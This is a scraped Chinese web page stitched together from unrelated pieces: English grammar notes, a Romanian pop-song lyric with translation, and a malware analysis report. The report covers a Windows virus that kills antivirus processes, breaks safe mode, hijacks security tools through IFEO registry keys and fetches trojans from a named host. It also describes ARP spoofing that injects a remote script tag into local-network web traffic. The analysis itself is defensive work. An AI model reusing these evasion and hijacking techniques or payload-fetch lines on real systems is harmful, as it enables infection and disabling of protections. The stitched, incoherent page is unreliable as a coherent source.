1 sometimes : 副词 adv 不时;有时
not very often
We sometimes visit our grandmother
我们有时去看我们的祖母。
Sometimes I wonder if he is honest
有时我怀疑他是否诚实。
2some time : 副词 adv 在未来某时, 经过若干时间
I will be back some time next week
3sometime : 副词 adv 某个时候;某日
at a time that one does not know exactly
I saw him sometime last year
我去年某个时候见到过他。
4 some times: 几次;几倍
是不定冠词a和定冠词the的区别。
This is the time of the Thai New Year翻译:这是泰国新年的时间。
This is a time for cleaning and washing away bad things翻译:这是清洗和清洗坏东西的时候了。
冠词是一种虚词。有不定冠词和定冠词两种。其中a(还有an,an放在元音开头单词的前面)不定冠词,放在单数的可数名词前面,表示泛指。the属于定冠词,表示特指。
冠词一般是用在名词前面,修饰名词所代表的人或物或事件。
用来修饰名词的还有形容词,如:beautiful、clever、lovely。
英语中还有动词(及物动词和 不及物动词),副词,介词等不同词性。
这首歌也是O-zone的,我查了罗马尼亚的歌迷论坛有这首歌的英文翻译
http://wwwfanclubro/despre-tine-english-translation-at13900html
Depsre Tine是About you的意思,翻译成中文就是“关于你”
萧饮寒
歌词如下
Depsre Tine: About you
Ma trezesc cu tine-n-gind
Despre tine vreau sa cint
Melodia mea de dor
Care place tuturor
I wake up with you in mind
I want to sing about you
My melody of longing
That everybody likes
Nu raspunzi la SMS
Eu iti scriu atit de des
Poate m-am purtat urit
Dar sa stii ca te-am iubit!
You don't answer my SMS
I write to you so often
Maybe I bahaved badly
But know that I loved you!
Ma inec in ochii tai
LA LU LA LA LEI
Plinge lumea dupa ei
LA LU LA LA LEI
Esti un inger pe pamint
I'm drowning in your eyes
Blah Blah
The world weeps for them
Blah Blah
You're an angel on the earth
Despre tine cint
Si zi si noapte
LA LA LEI
About you I sing
Day and night
Blah Blah
Ma inec in ochii tai
LA LU LA LA LEI
Plinge lumea dupa ei
LA LU LA LA LEI
Esti un inger pe pamint
I'm drowning in your eyes
Blah Blah
The world weeps for them
Blah Blah
You're an angel on the earth
Despre tine cint
Si zi si noapte
LA LA LEI
About you I sing
Day and night
Blah Blah
Daca mergi cu mine-n-vis
Am sa te invat sa rizi
Si-am sa-ti cint pina in zori
Cintecelul meu de dor
If you come with me in (my) dream
I will teach you how to laugh
And I'll sing to you until the dawn
My little song of longing
Nu raspunzi la SMS
Eu iti scriu atit de des
Poate m-am purtat urit
Dar sa stii ca te-am iubit!
You don't answer my SMS
I write to you so often
Maybe I bahaved badly
But know that I loved you
we are happy to be here我们很高兴来这里
for后面不能连接动词原形be,可以连接动名词being,表示事件
Be on time tomorrow词组on time,按时
Keep off the grass离玻璃远点儿off表示距离
以上两句均为祈使句
It's very bad to spit on the ground随地吐痰很不好
to spit on the ground动词不定式是本句的真实主语,因为太长了,所以放在句尾,而用it代表它站在主语的位置ground指地面,地表,地上,所以介词用on如果说一定要把痰吐到地里面去,要说into the earth,仍然是带着to的in,to在此表示去向,目标,目的地
最近发现很多人出现了打不开shadu软件 反病 毒工具 甚至带有病 毒字样的窗口 今天就接到了这样的一个样本 先前
这是一个可以说结合了几乎所有病 毒的特征的病毒 除了感染文件之外 可以说是比熊猫有过之而无不及!
病毒特征:
1破坏安全模式
2结束常见杀毒软件以及反病毒工具进程
3监控窗口
4关闭自动更新以及Windows安全中心
5屏蔽显示隐藏文件
6下载木马
7IFEO映像劫持
8GHOST文件引导破坏
9各盘符均有引导启动关联文件,即便你重装系统盘也照样发作
分析报告
File: 1201AEC1exe
Size: 36435 bytes
MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB
SHA1: E760703C8776C652B424FA62AF945434FB786BE5
CRC32: 27CA1195
加壳方式:UPX
病毒运行后
在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文
件名的dll 和一个同名的dat 文件
我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDDdll
这个随机的数字应该与机器码有关
该dll插入Explorer进程 Timplatform以及ctfmon进程
监视并关闭以下进程以及窗口
AntiVirus
TrojanFirewall
Kaspersky
JiangMin
KV200
kxp
Rising
RAV
RFW
KAV200
KAV6
McAfe
Network Associates
TrustPort
NortonSymantec
SYMANT~1
Norton SystemWorks
ESET
Grisoft
F-Pro
Alwil Software
ALWILS~1
F-Secure
ArcaBit
Softwin
ClamWin
DrWe
Fortineanda Software
Vba3
Trend Micro
QUICKH~1
TRENDM~1
Quick Heal
eSafewido
Prevx1
ers
avg
Ikarus
SophoSunbeltPC-cilli
ZoneAlar
Agnitum
WinAntiVirus
AhnLab
Normasurfsecret
Bullguard\Blac
360safe
SkyNet
Micropoint
Iparmor
ftc
mmjk2007
Antiy Labs
LinDirMicro Lab
Filseclab
ast
System Safety Monitor
ProcessGuard
FengYun
Lavasoft
NOD3
mmsk
The Cleaner
Defendio
kis6Beheadsreng
IceSword
HijackThis
killbox
procexp
Magicset
EQSysSecureProSecurity
Yahoo!
baidu
P4P
Sogou PXP
ardsys
超级兔子木马
KSysFiltsys
KSysCallsys
AVK
K7
Zondex
blcorp
Tiny Firewall Pro
Jetico
HAURI
CA
kmx
PCClear_Plus
Novatix
Ashampoo
WinPatrol
Spy Cleaner Gold
CounterSpy
EagleEyeOS
Webroot
BufferZ
avp
AgentSvr
CCenter
Rav
RavMonD
RavStub
RavTask
rfwcfg
rfwsrv
RsAgent
Rsaupd
runiep
SmartUp
FileDsty
RegClean
360tray
360Safe
360rpt
kabaload
safelive
Ras
KASMain
KASTask
KAV32
KAVDX
KAVStart
KISLnchr
KMailMon
KMFilter
KPFW32
KPFW32X
KPFWSvc
KWatch9x
KWatch
KWatchX
TrojanDetector
UpLiveEXE
KVSrvXP
KvDetect
KRegEx
kvol
kvolself
kvupload
kvwsc
UIHost
IceSword
iparmo
mmsk
adam
MagicSet
PFWLiveUpdate
SREng
WoptiClean
scan32
hcfg32
mcconsol
HijackThis
mmqczj
Trojanwall
FTCleanerShell
loaddll
rfwProxy
KsLoader
KvfwMcl
autoruns
AppSvc32
ccSvcHst
isPwdSvc
symlcsvcnod32kui
avgrssvc
RfwMain
KAVPFW
Iparmor
nod32krn
PFW
RavMon
KAVSetup
NAVSetup
SysSafe
QHSET
zxsweep
AvMonitor
UmxCfg
UmxFwHlp
UmxPol
UmxAgent
UmxAttachment
KPFW32
KPFW32X
KvXP_1
KVMonXP_1
KvReport
KVScan
KVStub
KvXP
KVMonXP
KVCenter
TrojDie
avpcom
krepairCOM
KaScrScnSCR
Trojan
Virus
kaspersky
jiangmin
rising
ikaka
duba
kingsoft
360safe
木马
木马
病毒
shadu
shadu
查 毒
防 毒
反 病 毒
专杀
专杀
卡 巴 斯 基
江 民
瑞 星
卡卡社区
金 山 毒 霸
毒霸
金 山 社 区
3 6 0 安全
恶 意 软 件
流 氓 软 件
举 报
报 警
杀 软
杀 软
防 骇
在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件
在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件
删除C:\WINDOWS\system32\verclsidexe
将其重命名为verclsidexebak
释放41115BDDexe(随机8位)和autoruninf到除系统分区外的其他分区
注册表相关操作
删除
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏安全模式
修改
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值
为0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001
屏蔽显示隐藏文件
修改常见杀毒软件服务的start键值为0x00000004
如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004
修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004
关闭自动更新
添加IFEO映像劫持项( 我的意见是用Autoruns删除映像劫持)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rptexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safeexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360trayexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adamexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvrexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvcexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitorexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpcom
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenterexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHstexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDstyexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShellexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThisexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSwordexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmoexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmorexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvcexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaloadexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScnSCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMainexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTaskexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDXexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFWexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetupexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStartexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchrexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMonexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilterexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32Xexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvcexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegExexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepairCOM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoaderexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenterkxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetectexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMclexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXPkxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolselfexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReportkxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScankxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXPexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStubkxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvuploadexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwscexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXPkxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9xexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchXexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddllexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSetexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsolexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczjexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmskexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetupexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krnexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kuiexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdateexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSETexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rasexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ravexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonDexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStubexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTaskexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegCleanexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfgexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMainexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxyexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrvexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgentexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupdexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiepexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safeliveexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUpexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREngexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvcexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafeexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetectorexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwallexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDiekxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHostexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgentexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachmentexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfgexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlpexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPolexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLiveEXEexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiCleanexe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweepexe
被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件
下载dl1exe到临时文件夹
首先下载http://googlexxxx38org/update/downtxt看病毒是否需要更新
然后分别下载http://googlexxxx38org/update/wowexe
http://googlexxxx38org/update/mhexe
http://googlexxxx38org/update/wmexe
http://googlexxxx38org/update/myexe
http://googlexxxx38org/update/wlexe
http://googlexxxx38org/update/ztexe
http://googlexxxx38org/update/jhexe
http://googlexxxx38org/update/tlexe
http://googlexxxx38org/update/1exe
http://googlexxxx38org/update/2exe 到program files 文件夹 并把他们命名为ycnt1exe~ycnt10exe
具体每个文件的生成物就不一一列举了
不过值得一提的是ycnt9exe这个木马
他生成C:\WINDOWS\system32\win1ogoexe
并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗
插入<script language=javascript src=http://google171738org/ad2js></script>代码
也就是局域网内所有用户在打开网页时都会被插入这段代码
欢迎分享,转载请注明来源:品搜搜测评网
微信扫一扫
支付宝扫一扫
